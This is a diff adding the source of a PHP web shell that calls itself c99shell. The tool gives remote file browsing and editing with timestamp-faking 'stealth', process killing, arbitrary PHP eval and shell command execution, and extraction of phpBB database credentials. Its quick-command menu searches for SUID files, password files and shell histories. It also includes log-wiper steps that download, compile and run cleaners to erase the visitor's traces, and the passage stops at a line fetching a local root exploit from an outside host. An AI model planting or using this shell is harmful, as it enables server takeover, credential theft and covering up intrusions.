+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><br/>
+    <b> Quick Commands </b></div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+         <SELECT NAME="cmd">
+		 <OPTION VALUE="#"> [File Manipulation]
+		 <OPTION VALUE="">                   
+		 <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system
+		 <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files
+           <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory
+           <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files
+           <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory
+		    <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions
+			 <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files
+             <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory
+             <OPTION VALUE="find / -type f -name "config*">Find config* files
+             <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory
+              <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files
+             <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory
+             <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files
+	    	 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory
+			 <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files
+			 <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory
+			 <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files
+			 <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory
+			 <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files
+			 <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory
+			 <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files
+			<OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory
+			 <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files
+			<OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory
+			<OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
+			<OPTION VALUE="">                   
+		<OPTION VALUE="#"> [Directory Malipulation]
+		<OPTION VALUE="">                  
+		<OPTION VALUE="pwd">List your current directory
+		<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable?
+		<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="">                   
+<OPTION VALUE="#"> [Miscellaneous Commands]
+<OPTION VALUE="">                   
+           <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable)
+  <OPTION VALUE="uname -a">Kernel version
+           <OPTION VALUE="w">Logged in users
+           <OPTION VALUE="lastlog">Last users to connect
+           <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+           <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords
+            <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo
+             <OPTION VALUE="netstat -atup | grep IST">Open ports    
+			 <OPTION VALUE="">                                     
+            <OPTION VALUE="#"> [Application Verification]
+			<OPTION VALUE="">                   
+            <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera)
+            <OPTION VALUE="locate gcc">Check For GCC
+			<OPTION VALUE="">                   
+		   <OPTION VALUE="#"> [Log Cleaners]
+		   <OPTION VALUE="">                   
+                    <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3)
+                    <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3)
+                    <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3)
+                    <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces
+                   <OPTION VALUE="">  
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish)
+                    <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish)
+                     <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish)
+                    <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces
+                   <OPTION VALUE=""> 
+                   <OPTION VALUE="#"> [Root Exploits]
+		   <OPTION VALUE=""> 
+                    <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1)
